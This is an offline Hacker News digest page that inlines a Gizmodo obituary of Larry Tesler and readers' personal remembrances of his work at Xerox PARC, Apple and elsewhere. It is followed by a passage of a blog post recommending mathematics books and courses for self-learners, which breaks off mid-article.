Hacker News with comments/articles inlined for offline reading

Authors ranked on leaderboard
Last updated:
Reload to view new stories

February 25, 2020 17:06



Front Page/ShowHN stories over 4 points from last 7 days
If internet connection drops, you can still read the stories
If there were any historical discussions on the story, links to all the previous stories on Hacker News will appear just above the comments.

Historical Discussions: Larry Tesler Has Died (February 18, 2020: 1345 points)
Larry Tesler has passed away (February 19, 2020: 2 points)

(1346) Larry Tesler Has Died

1346 points 7 days ago by drallison in 1672nd position

gizmodo.com | Estimated reading time – 4 minutes | comments | anchor

The advent of the personal computer wasn't just about making these powerful machines available to everyone, it was also about making them accessible and usable, even for those lacking a computer science degree. Larry Tesler, who passed away on Monday, might not be a household name like Steve Jobs or Bill Gates, but his contributions to making computers and mobile devices easier to use are the highlight of a long career influencing modern computing.

Born in 1945 in New York, Tesler went on to study computer science at Stanford University, and after graduation he dabbled in artificial intelligence research (long before it became a deeply concerning tool) and became involved in the anti-war and anti-corporate monopoly movements, with companies like IBM as one of his deserving targets. In 1973 Tesler took a job at the Xerox Palo Alto Research Center (PARC) where he worked until 1980. Xerox PARC is famously known for developing the mouse-driven graphical user interface we now all take for granted, and during his time at the lab Tesler worked with Tim Mott to create a word processor called Gypsy that is best known for coining the terms "cut," "copy," and "paste" when it comes to commands for removing, duplicating, or repositioning chunks of text.

Xerox PARC is also well known for not capitalizing on the groundbreaking research it did in terms of personal computing, so in 1980 Tesler transitioned to Apple Computer where he worked until 1997. Over the years he held countless positions at the company including Vice President of AppleNet (Apple's in-house local area networking system that was eventually canceled), and even served as Apple's Chief Scientist, a position that at one time was held by Steve Wozniak, before eventually leaving the company.

In addition to his contributions to some of Apple's most famous hardware, Tesler was also known for his efforts to make software and user interfaces more accessible. In addition to the now ubiquitous "cut," "copy," and "paste" terminologies, Tesler was also an advocate for an approach to UI design known as modeless computing, which is reflected in his personal website. In essence, it ensures that user actions remain consistent throughout an operating system's various functions and apps. When they've opened a word processor, for instance, users now just automatically assume that hitting any of the alphanumeric keys on their keyboard will result in that character showing up on-screen at the cursor's insertion point. But there was a time when word processors could be switched between multiple modes where typing on the keyboard would either add characters to a document or alternately allow functional commands to be entered.

There are still plenty of software applications where tools and functionality change depending on the mode they're in (complex apps like Photoshop, for example, where various tools behave differently and perform very distinct functions) but for the most part modern operating systems like Apple's macOS and Microsoft's Windows have embraced user-friendliness through a less complicated modeless approach.

After leaving Apple in 1997, Tesler co-founded a company called Stagecast Software which developed applications that made it easier and more accessible for children to learn programming concepts. In 2001 he joined Amazon and eventually became the VP of Shopping Experience there, in 2005 he switched to Yahoo where he headed up that company's user experience and design group, and then in 2008 he became a product fellow at 23andMe. According to his CV, Tesler left 23andMe in 2009 and from then on mostly focused on consulting work.

While there are undoubtedly countless other contributions Tesler made to modern computing as part of his work on teams at Xerox and Apple that may never come to light, his known contributions are immense. Tesler is one of the major reasons computer moved out of research centers and into homes.




All Comments: [-] | anchor

alankay(10000) 5 days ago [-]

I knew Larry Tesler as a colleague, friend, member of my research group, manager, etc. for more than 50 years, almost as long as I knew Bert Sutherland.

There is an excellent obit for Larry at: https://gizmodo.com/larry-tessler-modeless-computing-advocat...

... and I expect another one from John Markoff -- who was a friend of his -- in the NYTimes.

In many ways, Larry did too many interesting things and had so much influence in too many areas for there to be any chance to characterize him technically. In short, he was a superb wide-spectrum(real) computer scientist who was also a very talented and skilled programmer.

His passing was sudden and unexpected, and I may return later to this note to add more details of his rich career.

For now, I remember him as great to work with in all aspects of his life. He was a great guy, and perhaps that sums him up as best as can be.

dang(195) 5 days ago [-]

We've put a link to that article in the title above. (This submission was originally a short text post.)

oblio(3448) 5 days ago [-]

Is anyone from Parc still involved in research these days? Or is everyone retired or just chugging along at regular corporate jobs?

ChuckMcM(537) 6 days ago [-]

Larry was a great thinker. I got to discuss 'vi vs. emacs' at one of the Fellows induction ceremonies held at the Computer History Museum. He could easily articulate counter cases and keep the discussion both productive and quite civil!

I first met him while I was visiting my wife at her office in Xerox Business Systems (XBS). He came over to discuss some suggestions to improve the protocol she was working on. I thought he was one of her co-workers because the discussion was very peer to peer as opposed to top down. She corrected me to point out he was one of the movers and shakers at PARC. That left a very positive impression on me.

He was also 'the other Larry' at Xerox. Larry Garlick, who was also 'Larry' to most people, was also at XBS (as was Eric Schmidt) and later followed Eric over to Sun.

mrandolph(10000) 6 days ago [-]

Which side of the debate was he on personally?

haeberli(10000) 6 days ago [-]

Eric Schmidt was, as I recall (which was when I was there), at PARC proper, doing his PhD thesis research and writing his thesis. But as Larry Tesler's interaction showed, there were fluid interactions between at least some people at PARC and the XBS and Xerox Star teams.

m0hit(3543) 5 days ago [-]

Only tangentially related but I loved reading this interview with him from Computer History Museum https://archive.computerhistory.org/resources/access/text/20...

It's not the same impact as the video interview in Designing for Interactions but covers a lot of ground from Larry Tesler's perspective.

suyash(3715) 7 days ago [-]

RIP Larry Tesler, I ran into him a few times at meetup events in Bay Area, few people knew who he was as he kept a very low profile.

dbg31415(3949) 6 days ago [-]

I met him at a meetup I went to out in SF while traveling for work. I didn't know anyone there, just going to kill time. I had no idea who he was just someone willing to chat with me for an hour or so. I started asking him what he did, and it was clear he wasn't there to talk about himself. Just struck me as a really cool, really humble, really approachable guy. With a lot of good ideas, and a passion for spreading curiosity. World needs more people like this, not less.

alariccole(3474) 6 days ago [-]

This breaks my heart. I used to work next to Larry—literally sat next to him—on Yahoo's central design team. We were in frequent meetings together, but didn't talk one-on-one often. One evening commuting from work, during one of many Caltrain failures, he noticed me as I waited outside the train and offered me a ride home. I remember sitting nervously in the car, a bit awestruck, and I finally got up the courage to ask him "Did you really invent copy and paste?!"

"Yes."

From then on the ice was broken and we chatted more freely: fun discussions about the (then) up-and-coming voice recognition UIs (I compared them to CLIs which he liked), wearables, design, and cycling.

I consider him a friend. Didn't expect us to lose him so soon.

jusujusu(10000) 5 days ago [-]

> he noticed me as I waited outside the train and offered me a ride home

Ctrl-X + Ctrl-V

alariccole(3474) 6 days ago [-]

To clarify, as the dialogue could be construed otherwise, Larry was actually very humble. While he was not as famous as he should have been, he had so much influence on the industry, it could easily go to your head. He was very approachable and helpful, and overall a generous and kind person. Will be sorely missed.

jakelazaroff(3868) 6 days ago [-]

Tangentially related question: is this why HN currently has a black bar above the navigation? To commemorate his death?

donarb(4282) 6 days ago [-]

Yes, people of significance in computing are honored this way.

penagwin(4302) 6 days ago [-]

Yes, HN does this when people who were impactful to the technology world have died to commemorate them.

aresant(698) 6 days ago [-]

A career in full from his own CV:

'Board director for a FTSE 250 company, vp in three Fortune 500 corporations, president of two small software firms. 32 years building and managing teams of software and hardware engineers, designers, researchers, scientists, product managers and marketers to deliver innovative customer-centered products.'

http://www.nomodes.com/Tesler_CV_Public.pdf

musicale(10000) 6 days ago [-]

Honest but overly modest summary. I picture hiring managers or AI throwing his resumé away because he didn't have enough experience and was 'out of date.'

The Apple and Xerox segments are nothing short of astonishing.

nl(1154) 6 days ago [-]

ARM (Advanced RISC Machines) Holdings, ltd Cambridge, England (co-founder)

Championed the spinout of Advanced RISC Machines (ARM) from Acorn plc and served on ARM's board for 13 years.

That turned out fairly well....

Scobleizer(10000) 6 days ago [-]

Two tech legends left us this week: Larry Tesler and Bert Sutherland. Both played key roles at PARC, the research center Xerox started that sparked large chunks of what we use today.

Regarding Tesler: I sat next to him when I flew back from interviewing at Microsoft. He was in the last row on the plane. I saw his Blackberry, assumed he was a nerd. He had just left Apple, was on the committee that hired Steve Jobs. He had his fingers in so much of the tech that we use today from object oriented programming to the Newton that set the stage for the iPhone.

Sutherland participated in the creation of the personal computer, the tech of microprocessors, the Smalltalk and Java programming languages, and much more.

Huge losses for our industry.

smarky0x7CD(10000) 6 days ago [-]

Also Peter Montgomery.

Legend in cryptography who created many algorithms for fast and secure elliptic curve cryptography.

https://en.wikipedia.org/wiki/Peter_Montgomery_(mathematicia...

linguae(4295) 6 days ago [-]

I was just eating lunch across the street from Apple's headquarters in Cupertino when I read the news.

The John Sculley era of Apple has received a lot of criticism. With that being said, one of the aspects of this era that I'm most impressed with is the work that came out of Apple's Advanced Technology Group. During this time period Apple was serious about advancing the state of research in the areas of programming languages, systems software, and human-computer interaction. There were many great people that were part of this group, including Larry Tesler and Don Norman. I completely understand why Steve Jobs shut down this group in 1997; times were rough for Apple, and the company couldn't afford to do research when its core business was in dire straits. But I wish Apple revived this group when its fortunes changed, and I also wish Apple still had the focus on usability and improving the personal computing experience that it had in the 1980s and 1990s.

timClicks(3641) 6 days ago [-]

Was Dylan created by the ATG?

buzzert(4313) 5 days ago [-]

Bagel Street Cafe?

mikelevins(10000) 6 days ago [-]

Larry was influential in the development and the missions of both ATG and the Human Interface Group, both of which are now gone now. He believed in conducting practical experiments with users and collecting objective measurements of how well UI worked. He wanted to find general principles that could be used to make all software better for everyone.

Steve Jobs killed both ATG and HIG. I think your point about times being rough and money being tight are valid, but three years earlier Steve Jobs sat in my office at NeXT and told me that if it was up to him, Apple would kill ATG and HIG--not because they were expensive, but because, in his words, they had too much influence.

Sure enough, when he took over Apple again, he wasted no time in killing them and replacing them with himself.

You're probably right that cutting those expenses was important to Apple's recovery. I think your other point is right, too, though: we'd be better off if Apple--or somebody--reconstituted something like HIG to show the industry what's possible if you take user experience and human-computer interaction seriously.

Unfortunately, Larry can't help us with it this time.

kristianp(421) 6 days ago [-]

There's one thing on his wikipedia page which I think is probably wrong: I don't think Wirth had any involvement with Object Pascal.

jdswain(10000) 6 days ago [-]

I think he did, as a consultant. The main reference I found was an article in MacTech, written by an Apple employee:

'Object Pascal is an extension to the Pascal language that was developed at Apple in consultation with Niklaus Wirth, the inventor of Pascal.'

http://preserve.mactech.com/articles/mactech/Vol.02/02.12/Ob...

mikelevins(10000) 6 days ago [-]

I met Larry in about 1992 when I went to work on the Newton project. I had seen him around Apple before, and I knew who he was and what he was known for, but I didn't actually meet him until I joined the Newton team. I found him friendly, modest, smart, shrewd, compassionate, full of interesting knowledge and ideas, and interested in other people and their ideas.

I got to know him better when John Sculley ordered him to have the Newton team ditch its Lisp OS and write one in C++. Larry approached me and a couple of other Lisp hackers and asked us to make a fresh start with Lisp and see what we could do on Newton. We wrote an experimental OS that Matt Maclaurin named 'bauhaus'.

Larry had a sabbatical coming up right about then. He took it with us. He crammed into a conference room with three or four of us and hacked Lisp code for six weeks. He was a solid Lisp hacker. He stayed up late with us and wrote AI infrastructure for the experimental OS, then handed it off to me when he had to, as he put it, 'put his executive hat back on.' He hung around with us brainstorming and arguing about ideas. He had us out to his house for dinner.

A little later, when things were hectic and pressure was high on Newton, one of our colleagues killed himself. Larry roamed the halls stopping to talk to people about how they were doing. I was at my desk when he came by, next to another colleague that I considered a friend. Larry stopped by to check on us. My friend had also been a good friend of the fellow who had died, and he lost his composure. Larry grabbed a chair, pulled it up close and sat with him, an arm around him, patting him gently while his grief ran its course.

After Newton was released, Larry moved on to other projects. I worked on the shipped product for a while, but I was pretty burned out. Steve Jobs persuaded me to go to work for NeXT for a little while.

Steve is infamous for being, let's say, not as pleasant as Larry. In fact, he sat in my office once trashing Larry for about half an hour, for no good reason, as far as I can see. I politely disagreed with a number of his points. Larry made important contributions to the development of personal computing, and he didn't have to be a jerk to do it.

Larry was extremely smart, but I never knew him to play I'm-smarter-than-you games. I saw him encourage other people to pursue, develop, and share their ideas. I found him eager to learn new things, and more interested in what good we could do than in who got the credit for it.

We weren't close friends, except maybe when we were crammed in a conference room together for six weeks. I didn't see him much after Newton, though we exchanged the occasional friendly email over the years.

I was just thinking lately that it was about time to say hello to him again. Oops.

Larry Tesler was one of the best people I met in Silicon Valley. He was one of the best people I've met, period. I'll miss him.

Shebanator(10000) 6 days ago [-]

This is a great story, definitely made things a little dusty for me. Thanks for sharing. My own experience with him was also special - he was such an amazing kind, generous, and insightful person. And he would easily qualify for my 'ten smartest people I've ever met' list if I was the sort of person who made such lists :-)

lukego(3918) 5 days ago [-]

(I'm having trouble with this seeming to be a feel-good anecdote about a high-pressure working environment in which people are burning out and killing themselves.)

potta_coffee(4311) 5 days ago [-]

Larry sounds like the kind of guy I'd want to know. Also, I didn't know Newton was written in Lisp, that's so cool.

artsyca(4100) 6 days ago [-]

This is the sort of environment I had always envisioned growing up dreaming of being a software professional

I've lost some colleagues along the way too you never know when it's going to happen every chance to speak should be treated with the respect of knowing it could very well be the last chance to make a connection

wlesieutre(10000) 5 days ago [-]

Having worked on the Newton you might get a kick out of this - when I was in high school there was a guy still using one with a WiFi PCMCIA card, probably straight up to when the iPhone launched. I imagine he jumped to a smartphone eventually, but he was still on the Newton in 2006.

Seemed like a neat little device.

GuiA(469) 6 days ago [-]

A reminder that our industry is very young still, and many who laid its foundations are still with us today, but won't be forever.

There is no better time than now for collecting oral history, interviewing people, asking them about their stories, etc. All of this knowledge and stories can get lost very very fast.

jacquesm(45) 6 days ago [-]

And, pretty basic, but thank them for their contribution. Plenty of the stuff we take for granted should not be taken for granted at all, it took a lot of dedicated people working on machines that were severely limited to give us the luxuries we have today and believe that it has always been so. It wasn't.

dmazin(3376) 6 days ago [-]

He gave us so much more than cut, copy, paste. It's clear from all the design history books that I've read that he's a legend.[1]

NO MODES!

https://itsthedatastupid.files.wordpress.com/2010/05/nomodes...

[1] One of the more rare sources for Larry Tesler's contributions is his interview for Bill Moggridge's Designing Interactions (http://www.designinginteractions.com/interviews/LarryTesler)

modeless(1461) 6 days ago [-]

The inspiration for my username.

nattaylor(4136) 6 days ago [-]

If you want to watch the interview and have trouble with flash, you can download http://www.designinginteractions.com/fla/LarryTesler.flv and then ffplay it.

MichaelMoser123(3814) 6 days ago [-]

RIP Larry Tesler

i have a .vimrc file that set C-C/C-X/C-V to work in each mode; that gets me the best of both worlds: fast text navigation in normal mode as i can switch to the next/previous word with w/b; but I can still copy and paste (limits us to one buffer, though; nothing is perfect)

https://github.com/MoserMichael/myenv/blob/master/VIMENV.md

djrobstep(3824) 6 days ago [-]

Is there somewhere he elaborates on his No Modes philosophy?

Is it a blanket rule for him for all interfaces, or just text editors?

jolmg(4183) 6 days ago [-]

The Wikipedia article for Cut, Copy, and Paste[1] seems to have this bit that's cited to that book:

> Inspired by early line and character editors that broke a move or copy operation into two steps—between which the user could invoke a preparatory action such as navigation—Lawrence G. Tesler (Larry Tesler) proposed the names 'cut' and 'copy' for the first step and 'paste' for the second step. Beginning in 1974, he and colleagues at Xerox Corporation Palo Alto Research Center (PARC) implemented several text editors that used cut/copy-and-paste commands to move/copy text.

I imagine those 'early line and character editors' refers to vi's delete, yank, and put, and emacs's kill, copy/'save as if killed', and yank. I wonder what other editors had back then, before the names he came up with became standardized.

I also wonder how the idea of the operations developed before Larry Tesler contributed to it.

Looking at POSIX[2], it seems ex has delete, yank, and put, but I can't see similar functionality in standard ed (GNU's ed does have yank, but I guess it's an extension).

[1] https://en.wikipedia.org/wiki/Cut,_copy,_and_paste#Populariz...

[2] https://pubs.opengroup.org/onlinepubs/9699919799/

atdrummond(4259) 6 days ago [-]

Larry kindly traded letters with me when I was a young man attempting to learn programming via Object Pascal. Eventually, my mom made me write him a check for all the postage he had spent. In addition to sending me at least two letters a week for just around a decade, he shipped me dozens of books and manuals. One year for the holidays, someone sent me 4 large FedEx boxes filled with networking gear I desperately needed for a "M"MORPG game I was building. The return label read "53414e544120414e442048495320574f524b53484f50". In the game, players were elves scrambling to defeat a corrupted workshop. The final boss was S̶a̶t̶a̶n̶ Santa himself.

It was only when I was older that I appreciated that he had probably sent me thousands of dollars worth of gear (and not in 2020 dollars!) in addition to the invaluable advice he provided, sometimes (frankly, often) unsolicited but always direct and always thought provoking.

While I never did become an extremely competent commercial developer, to this day I enjoy programming for programming's own sake. Larry's push for me to fix my own headaches, rather than simply giving me a metaphorical aspirin, resulted in my development of solutions for small hobby problems that it appeared often only myself and perhaps a few others shared.

As it turns out, in spite of (or thanks to) my niche interests, my curiosity and the method of targeted problem solving Larry fostered set me on a path I remain on today. Frankly, his contributions helped mold me as a man more than those of any other mentor of mine; that is absolutely meant as a compliment to his prescient pedagogy, rather than a slight at my life's many other wonderful influences.

I've sold a few businesses thanks to Larry's problem solving approach. The rest I founded are running profitably - and somehow I've never lost an investor money. My customers have always, above all else, been happy because they had their problems fixed. (Or, perhaps thanks to his influence, their happiness stemmed from my teams simply providing them with the tools they needed to solve their own problems!)

And because I followed Larry's personal advice, I have been able to spend every day for nearly two decades doing what he encouraged and what has consistently engaged me: finding, isolating and destroying problems.

Thank you for everything.

zarmin(10000) 6 days ago [-]

Great story, thanks for sharing.

zymhan(3193) 6 days ago [-]

Wow, that is quite the gesture.

Jupe(3945) 6 days ago [-]

Cute... 53414e544120414e442048495320574f524b53484f50 = SANTA AND HIS WORKSHOP

bilekas(10000) 6 days ago [-]

> doing what he encouraged

Did he encourage you do be you ?

Are you You because of him, maybe not, because its impossible to grade.

But here you are paying respect to a man that you met, so I would say: he had an impact on you. Even at that moment.

We could play highschool politics and as what you learnt from him.

But from your message it's clear.

I never met him personally, but I certainly felt his impact.

RIP

drudru11(3793) 6 days ago [-]

Great story to honor him. Maybe it is now time for you to be the 'Larry' in others lives.

3fe9a03ccd14ca5(4316) 6 days ago [-]

Does anyone else find it strange that there's rarely any mention of cause of death in Wikipedia? Is it uncouth to ask how someone passed away?

pmcjones(10000) 5 days ago [-]

Markoff's obituary [1] in the New York Times says, 'The cause was not known, his wife, Colleen Barton, said, but in recent years he had suffered the effects of an earlier bicycle accident.'

[1] https://www.nytimes.com/2020/02/20/technology/lawrence-tesle...

Stratoscope(3182) 6 days ago [-]

Sometimes it's mentioned, sometimes the family prefers privacy. It's not uncouth to ask, but it's good to respect that privacy if the family does not share the cause of death.

alankay(10000) 4 days ago [-]

A very nice remembrance by John Markoff in the NYTimes: https://mail.yahoo.com/d/folders/1/messages/AOkUKy0vu8HQXk9u...

falcor84(3941) 7 days ago [-]

I couldn't find any corroboration of this. What happened?

jacobwilliamroy(4232) 6 days ago [-]

I think you guys dehumanize these people by reducing them to one or two sentences about computers. You havent lost this man. You didnt even know him.

mindcrime(378) 6 days ago [-]

You don't necessarily need to know someone personally to feel a sense of loss. You can feel a 'bond' with with someone based on all sorts of things: being members of a common community, sharing a common occupation, etc., etc.

To illustrate one case that hits close to home for me... when I think about the 343 firefighters who were killed on 9/11, I find it difficult not to tear up at times. Even though I never met any of them, and couldn't tell you any of their names. But we shared a common bond, by virtue of being firefighters. My sense of loss at their death is rooted in how deeply I admire all of them for the bravery and courage they displayed on that day, putting their lives on the line in the name of saving others. Do I feel that as strongly as if I had been the literal biological sibling of one them? Possibly not, but they were still my brothers, and the sense of loss is still real.

mturmon(3929) 6 days ago [-]

Without piling on: sometimes this is how you get to know someone.

It used to be interesting to scan the obit section of newspapers, just to see the parade of characters and achievements that I had missed or not known enough of.

Shebanator(10000) 6 days ago [-]

Some of us actually did know him. I did, albeit not as well as others here, and I see no harm and much good in people celebrating his accomplishments in his chosen career.

tobr(1728) 6 days ago [-]

Larry Tesler was really convinced of the merits of modeless interfaces. He even got "NOMODES" on his license plate.

https://queeniehui.wordpress.com/2013/10/03/designing-intera...

hawflakes(10000) 6 days ago [-]

Was at 23andME when he was there, too. We (engineering) had no idea who he was initially but I did notice his license plate 'NO MODES.' Only after we looked him up and found that he had invented copy-paste did we realize he was a living legend. Sad to see he's passed on.





Historical Discussions: Mathematics for the Adventurous Self-Learner (February 23, 2020: 1116 points)

(1159) Mathematics for the Adventurous Self-Learner

1159 points 1 day ago by nsainsbury in 3512th position

www.neilwithdata.com | Estimated reading time – 32 minutes | comments | anchor

For over six years now, I've been studying mathematics on my own in my spare time - working my way through books, exercises, and online courses. In this post I'll share what books and resources I've worked through and recommend and also tips for anyone who wants to go on a similar adventure.

Self-studying mathematics is hard - it's an emotional journey as much as an intellectual one and it's the kind of journey I imagine many people start but then drop off after a few months. So I also share (at the end) the practices and mindset that have for me allowed this hobby to continue through the inevitable ups and downs of life (raising two young boys, working at a startup, and moving states!)

How it all began for me

I used to love mathematics. Though I ended up getting an engineering degree and my career is in software development, I had initially wanted to study maths at university. But the reality is, that's a very tough road to take in life - the academic world is, generally speaking, a quite tortuous path with low pay, long hours, and rife with burnout. So I took the more pragmatic path and as the years went by never really found the time to reconnect with math. That was until about six years ago when I came across Robert Ghrist's online course Calculus: Single Variable (at the time I took it, it was just a Coursera course but now it's freely available on YouTube). Roughly 12 weeks and many filled notebooks later, I had reignited my interest in math and felt energized and excited.

Robert, if you read this: thanks for being such an inspiring teacher.

Why learn mathematics?

Growing up I always loved puzzles and problem solving. I would spend hours working my way through puzzle books, solving riddles, and generally latching on to anything that gives you that little dopamine hit.

If you're similar, mathematics might just be for you. Mathematics is hard. Seriously hard. And then suddenly, what was hard is easy, trivial, and you continue your ascent on to the next hard problem. It deeply rewards patience, persistence, and creativity and is a highly engaging activity - it's just you quietly working away, breaking down seemingly impossible problems and making them possible. I can't say enough how deeply satisfying and personally enriching it is to make the impossible, possible through your own hard work and ingenuity.

One thing many people don't know as well is that the mathematics you learn at most high schools is actually quite different from what you're exposed to at the university level. The focus turns from being about rote computation to logic, deduction, and reasoning. A great quote I read once is that for most of us, when we learn mathematics at school, we learn how to play a couple of notes on a piano. But at university, we learn how to write and play music.

Picking the right books and courses for self-learning

As a self-learner, it's critical to pick books with exercises and solutions. At some point later on you can swap to books without exercises and/or solutions, but in the beginning you need that feedback to be able to learn from your mistakes and move forward when you're stuck.

The books you pick as a self-learner are also sometimes different from what you would work use if you were engaged in full-time study at a university. Personally, I lean more towards books with better exposition, motivation, and examples. In a university setting, lecturers can provide that exposition and complement missing parts of books they assign for courses, but when you're on your own those missing bits can be critical to understanding.

I recommend avoiding the Kindle copies of most books and always opting for print. Very few math books have converted to digital formats well and so typically contain many formatting and display errors. Incidentally, this is often the main source for bad reviews of some excellent books on Amazon.

I'd be remiss as well if I didn't mention the publisher Dover. Dover is a well known publisher in the math community, often publishing older books at fantastically low prices. Some of the Dover books are absolutely brilliant classics - I own many and have made sure to make note of them in my recommendations below. If you don't have a big budget for learning, go for the Dover books first.

In several places I also recommend courses from MIT OpenCourseware. These courses are completely free and often have full recorded video lectures, exam papers with solutions, etc. If you like learning by video instruction and find at various points that you're getting a bit lost in a book, try looking up an appropriate course on MIT OpenCourseware and seeing if that helps get you unstuck.

Pretty much all my books I recommend below focus on undergraduate level math, with an emphasis on pure vs applied. That's just because that's the level that I'm at and also the kind of maths I like the most!

And also, just a final note that the order of books I recommend below is not exactly the order I worked through them - rather, it's the order I think they should be worked through. Sometimes I picked up a book that was too hard and had to double back and wait until I was ready. And some books have only just come out recently as well (eg. Ivan Savov's 'No BS' books) so weren't available to me when I was at that stage of learning. In short, you get to benefit from my hindsight and missteps along the way.

Alright, let's jump in to the recommendations!

Foundations

I'm going to assume a high-school level of maths is where you last left-off and that it's been some time since then that you've last done any maths. To get going, there's a couple of books I recommend:

The Art of Problem Solving, Vol 1 & 2 (with solutions manuals) - Lehoczky and Rusczyk

The Art of Problem Solving books are wonderful starter books. They're oriented heavily towards exercises and problem solving and are fantastic books to get you off to a start actually doing maths and also doing it in a way that's not just repetitive and boring. Depending on your level of mathematical maturity, you may only want to work through volume 1 and come back to volume 2 after you've worked through a proofs book first though (the second volume has many more questions involving writing proofs which you may not yet be comfortable enough to do at this stage). Volume 2 has many excellent exercises though, so don't skip it!

No bullshit guide to math and physics - Savov

If your calculus is a little rusty or you never really understood it in high-school, I recommend working through this book. It's compact, free of long-winded explanations, and contains lots of exercises (with solutions). This book teaches calculus in a contextually motivated way by teaching it alongside mechanics, which is how I think calculus should always be taught initially (I almost recommended Kline's Calculus: An Intuitive and Physical Approach here instead, as a book I also very much like, but Kline's book is just so thick and verbose. If you do like that additional exposition, you may want to consider this book as an alternative).

Also, of course I must mention the course that started it all for me, Calculus: Single Variable. It appears Coursera has now broken the course up into several parts and as I mentioned you can also find the full lessons on YouTube. Work through either this or Savov's book - depending on whether you prefer learning from books or online courses.

A historical (and motivated) perspective

I think it's useful early on in the learning journey to have a broad map of where math has been, what has motivated its development to date, and also where it's going.

Mathematics for the Nonmathematician (Dover) - Kline

For a historical view, I highly recommend reading through Kline's Mathematics for the Nonmathematician. It contains a small handful of exercises, but they're not the main focus - this is one of the few math books I recommend that you can just leisurely read.

Concepts of Modern Mathematics (Dover) - Stewart

While Kline provides the historical perspective, Stewart will provide you with the modern perspective. This is one of the first math books I read that genuinely made me excited and deeply want to understand topology - up until then, I was only somewhat dimly aware of the subject and thought it was a bit silly. Like the Kline book, this book also has no exercises - but for me it was a springboard and motivator to open other related books and dig in and do some hands-on math.

Mathematics and Its History - Stillwell

I consider Mathematics and Its History to be somewhat optional at this point, but I want to mention it because it's so darn good. If you read through Kline's and Stewart's books and thought 'You know what, these ideas are really nice but I'd love to go more hands-on with them with some exercises' then this book is for you. Want to try to do some gentle introductory exercises from fields like noneuclidean geometry, group theory, and topology, not just idly read about them? This book might be for you.

BBC's A Brief History of Mathematics (Podcast) - du Sautoy

If you prefer listening over reading, I recommend listening to the 10-part podcast A Brief History of Mathematics that focuses on the interesting lives and personalities of some of the driving historical forces in mathematics (Galois, Gauss, Cantor, Ramanujan, etc.).

Proofs and mathematical logic

For many, your first proof book is where everything clicks and you begin to understand that there is more to math than just calculation. For this reason, many people have very strong feelings about their favourite proofs book and there are indeed several that are quite good. But my favourite of all of them is:

An Introduction to Mathematical Reasoning - Eccles

I think what I love most about An Introduction to Mathematical Reasoning is how it successfully pairs explanation with exercises, which is a recurring theme in books that I tend to gravitate to. Good exercises are an extension of the teaching journey - they tell their own story and have progression and meaning. And at the time I worked through this book, the difficulty was just right. A good chunk of the book is occupied with applying the proof techniques you learn to different domains like set theory, combinatorics, and number theory, which is also something that personally resonated with me.

Book of Proof - Hammack

Book of Proof is a nice little proofs book. It's not too long and has a good number of exercises. If you're looking for a gentler introduction to proofs this is the one to go for. For the edition I used, it contained solutions for every second problem with full solutions available on the author's personal website, which I believe is still the case today.

Calculus/Real Analysis

Calculus - Spivak

Spivak's Calculus is the among the best maths book I have ever worked through but don't be fooled by the name - this is an introductory book to real analysis and is very different from the Calculus books mentioned earlier which emphasize computation. The emphasis for this book is on building up the foundations step by step for single variable calculus (starting from the construction of real numbers). It is a wonderfully coherent and realized book and what's also great about it is once again the exercises complement and expand on the content so well. Speaking of the exercises, some are seriously hard. This book took me about 6 months to work through because at the time I was still committed to solving every single exercise on my own. I almost burned out and I discuss what I learned from that experience coming up.

Everybody should own this book.

Calculus - Apostol

Spivak's book can be genuinely too hard for some people at this stage. For that reason, there are two other books I'm happy to recommend as alternatives.

The first is Apostol's Calculus. Apostol proceeds at a more leisurely pace compared to Spivak, and is happy to spend time building up your intuition with examples and geometric arguments before diving in to more rigorous proofs. Interestingly enough, the book also goes a fairly long way in introducing linear algebra in the final few chapters. I do like as well that this book introduces integration before differentiation, which you'll know if you read through Kline's historical book, is more historically accurate.

One thing to note is this book can be quite hard to find and unfortunately the edition I have has some weird print quality issues. Your mileage may vary.

Introduction to Analysis - Mattuck

The second introductory analysis book I'm happy to recommend is Mattuck's Introduction to Analysis. As with Spivak, this book mostly focuses on real-valued functions of a single variable and only in the last few chapters goes beyond. Mattuck makes clear in the introduction that this book was written for those struggling with analysis and less confident with proof techniques and I think it succeeds really well in what it set out to do. If you're struggling with Spivak, pick this book up.

Linear Algebra

For Linear Algebra, I can suggest two different learning paths. If you prefer to work through books only, I recommend working through Savov and Axler for both the applied and pure views of linear algebra. However, if you're comfortable with video instruction, I really like Gilbert Strang's Linear Algebra material (both the book and the online course).

Starting with Savov and Axler:

No bullshit guide to linear algebra - Savov

No bullshit guide to linear algebra is a book that has only come out quite recently, and it's a book I read only after already making my way through more advanced texts. That necessarily changes your perspective, but nonetheless I still think this is an excellent book for a first introduction to linear algebra. One quality of the book I really appreciated was the healthy coverage of applications in the final few chapters - looking at the application of linear algebra to problems in cryptography, fourier analysis, probability, etc.

Linear Algebra Done Right - Axler

Linear Algebra Done Right is a quite well known book, famous for its non-standard treatment of determinants, only really introducing them towards the end of the book. Incidentally, this is what the 'Done Right' in the title refers to: Axler has a bone to pick with determinants and doesn't hide it. It's a pure-math proofs focused book with nothing in the way of applications, which is also why I suggest pairing this book with Savov's which is more applied/computational. The proofs in the book are excellent and are a model for clarity and simplicity - working through this book really helped me build up a strong foundational intuition for linear algebra. The book unfortunately does not come with solutions to the exercises, but many can be found online.

Introduction to Linear Algebra and MIT OCW Linear Algebra - Strang

Here I treat both the book and the course as one, because they complement each other so well. What that does mean however is that you'll often find yourself jumping back and forwards between the book and the videos - for some people that's going to be a plus and enhance the learning experience (in many ways, it's much like it would be if you attended MIT in person) while for others that's a big detracting point. I'll leave it for you to decide which is best for you. In terms of the material, the focus is mostly on the applied side of things but still managing to touch on the theory in places. The exercises are quite good, plus you also get access to the MIT exams (with solutions).

Coding the Matrix: Linear Algebra through Applications to Computer Science - Klein

If you're a software developer like me, I wholeheartedly recommend that you pick up Coding the Matrix. I originally learned about this book through a course on Coursera but never took the online course and instead went straight for the book. The emphasis of the book is on programming (with Python), applying techniques from linear algebra to applied problems such as compression, image manipulation, machine learning, etc. It's the kind of book that I think works best if you've already had some introduction to linear algebra by working through any of the above above recommended books, giving your theoretical foundations a really strong applied grounding.

A brief interlude to talk about study, exercises, and taming the completionist inside you

Ok, let me take a moment to share some hard-won advice. When it comes to solving exercises as you work through these books, the completionist mindset will destroy you. When I first set out on my adventure, I would refuse to move forward in a book until I had solved every problem. This worked up to a point...and that point was when I met Spivak and had to finally concede defeat.

It's hard to put a formal rule on how long you should spend on any given exercise before 'giving up' and looking at the solution. I would say a lower bound should be maybe 20 minutes or so. But the upper bound? I don't know. For some problems, it can be fruitful and productive to spend days (weeks even?) thinking about them provided you're making some kind of incremental progress or still have tricks in your bag you want to apply.

